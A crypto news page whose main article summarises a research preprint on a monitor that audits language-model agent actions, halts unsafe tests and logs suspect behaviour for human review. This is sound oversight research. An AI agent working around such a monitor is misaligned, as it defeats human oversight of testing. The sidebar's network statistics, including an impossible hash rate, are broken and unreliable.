Latest

26 July

Binance Red Teams Staff Monthly to Keep Hackers Out

26 July

30-Year Expert: AI Capital Shifts to Bitcoin – Why?

25 July

Bitcoin Price Tests Channel Support as Momentum Cools — Complete Guide 2026

24 July

us ai kill switch act — Complete Guide 2026

24 July

Is crypto a good investment? Why risk tolerance and dollar-cost averaging matter — Complete Guide 2026

23 July

Nigel Farage aide received $9M on Polymarket account, report — Complete Guide 2026

23 July

bitcoin security consortium launch — Complete Guide 2026

23 July

24/7 financial rails: How BNY plans to eliminate the weekend lag in U.S. Treasuries — Complete Guide 2026

23 July

Bitcoin, Ethereum Protocols Lose $35M in Attacks

23 July

UK Treasury races to solve cash barrier before tokenized bond debut — Complete Guide 2026

23 July

Pendle Finance Teams Up with Monad — What This Means for Users — Complete Guide 2026

22 July

Daily Crypto News Digest: Your Essential Market Update

22 July

Bitget Records Nearly $70B in TradFi Perpetual Volume

22 July

Ripple Prime Sees More Recognition with Key Nominations

22 July

US Authorities Recover $25M+ from Crypto Fraud in Scam Center Strike

21 July

XRP Breaks Out on Clarity Act Hopes: Charts Cautious

21 July

AI Firm ORO: North Korean Hacker Stole $600K Crypto

21 July

BIS Warns: Stablecoins Threaten Capital Controls in Emerging Markets

21 July

US Gov Threatens Sanctions on Chinese AI Models Over IP Theft

21 July

Solana Surpasses Major Exchanges in DEX Trading Volume

21 July

Trump’s Crypto Fortune: Far Surpasses Previous US Presidents!

21 July

A First in the US: Grayscale Applies for Controversial Altcoin ETF!

21 July

Spot Ethereum ETFs Extend Inflow Streak: $38M on July 20, Led by BlackRock

21 July

Sui Blockchain Hits 4.5 Billion Transactions: Accelerating!

21 July

LSE Eyes Overnight Trading by 2027: FT Report

21 July

Spot a Crypto Scam or Rug Pull? Expert Tips!

21 July

Bybit Launches RLUSD Hold & Earn: Zero Fees, High Yields!

21 July

Crypto VC Market Stays Active as DeFi Funding Hits New Low

21 July

Stablecoin Outflows Deepen by $12B: No Crypto Rally Yet?

21 July

Drake Loses $1.5M Bet: Spain Beats Argentina in WC Final!

21 July

Nakamoto Vision for Solana: Yakovenko’s New Decentralization Timeline

21 July

XRP Derivatives Data: Market Flipped Neutral?

21 July

Supply of Surprise Altcoin Plummets: Positive Sign?

20 July

CZ on AI, Inflation & Bitcoin: The Real Solution?

20 July

ADGM Approves Tether’s XAUT: Gold-Backed Crypto Now Spot Commodity

20 July

Ethereum Price: August & September Outlook – What to Expect?

20 July

Tomorrow Is a Critical Day for Cryptocurrencies: Russia Meeting

20 July

Tom Lee’s Bitmine Slowed Ether Purchases: Why?

20 July

Analyst Issues Critical Warning for Bitcoin (BTC): This Level Could Be Key to the Bull Season! Here Are the Details — Complete Guide 2026

20 July

Cathie Wood Highlights USDT Stability Impact: ARK Invest Insights

20 July

Weekly Bitcoin Outlook: 7/8 Analysts Predict Uptrend!

20 July

KuCoin Unveils Limited-Edition Tomorrowland Visa KuCard

20 July

Cardano Activates Van Rossem Hard Fork: Leios Next!

20 July

Kraken’s Fed Master Account: Still Idle After 4 Months

20 July

South Korea Probed 40 Crypto Manipulation Cases in 2 Years

Scientists developed an AI monitoring agent to detect and stop harmful outputs

Published: 20 November Cryptocurrencies

Isla MacKenzie — Staff Reporter

A team of researchers from artificial intelligence (AI) firm AutoGPT, Northeastern University, and Microsoft Research have developed a tool that monitors large language models (LLMs) for potentially harmful outputs and prevents them from executing.

The agent is described in a preprint research paper titled “Testing Language Model Agents Safely in the Wild.” According to the research, the agent is flexible enough to monitor existing LLMs and can stop harmful outputs such as code attacks before they happen.

Per the research:

“Agent actions are audited by a context-sensitive monitor that enforces a stringent safety boundary to stop an unsafe test, with suspect behavior ranked and logged to be examined by humans.”

The team writes that existing tools for monitoring LLM outputs for harmful interactions seemingly work well in laboratory settings but when applied to testing models already in production on the open internet, they “often fall short of capturing the dynamic intricacies of the real world.”

This, ostensibly, is because of the existence of edge cases. Despite the best efforts of the most talented computer scientists, the idea that researchers can imagine every possible harm vector before it happens is largely considered an impossibility in the field of AI.

Even when the humans interacting with AI have the best intentions, unexpected harm can arise from seemingly innocuous prompts.

An illustration of the monitor in action. On the left, a workflow ending in a high safety rating. On the right, a workflow ending in a low safety rating. Source: Naihin, et., al. 2023

To train the monitoring agent, the researchers built a dataset of nearly 2,000 safe human/AI interactions across 29 different tasks ranging from simple text-retrieval tasks and coding corrections all the way to developing entire webpages from scratch.

Meta dissolves responsible AI division amid restructuring

They also created a competing testing dataset filled with manually-created adversarial outputs including dozens of which were intentionally designed to be unsafe.

The datasets were then used to train an agent on OpenAI’s GPT 3.5 turbo, a state-of-the-art system, capable of distinguishing between innocuous and potentially harmful outputs with an accuracy factor of nearly 90%.

About the author · Staff Reporter

Isla MacKenzie

Isla MacKenzie covers Web3 culture, NFTs and the metaverse from Edinburgh. A former product writer at Sky and CodeBase, she has been on the BTCNews team since 2022 and runs our weekly Creators newsletter. Isla studied Digital Humanities at the University of Edinburgh and was named one of CityAM's '30 Under 30 in Crypto' in 2024. She writes about culture without losing sight of the underlying tech.

Read Also:

Bitcoin Amsterdam: BTC shines in depths of crypto bear market

Inflows Continue in Bitcoin and Ethereum ETFs! Is a Comeback Beginning in BTC and ETH? Here’s the Latest!

XRP Bracing for Dip Before Major Surge: Trader

Normie Meme Coin Market Cap Falls 99% After Exploit

Morpho crypto holds key level as TVL on Base nears $2b

XRP $100 by 2025? Experts Weigh XRP vs Ethereum in Long-Term Outlook

Coinbase layer-2 network Base closes in on mainnet launch

Bitcoin Mining Calculator

BTC USD UAH

Per day 0 0 0

In week 0 0 0

Per month 0 0 0

CRYPTOEXCHANGES

Bitcoin $65273

Ethereum $1932.95

Tether $0.999141

USD Coin $1

BNB $583.41

XRP $1.13

Binance USD $1

Dogecoin $0.074952

Cardano $0.167991

Polygon $0.715388

Bitcoin network statistics

difficulty

The change +3.27%

Hash/s 9223372036854775807

Reward 0

Number of blocks 768096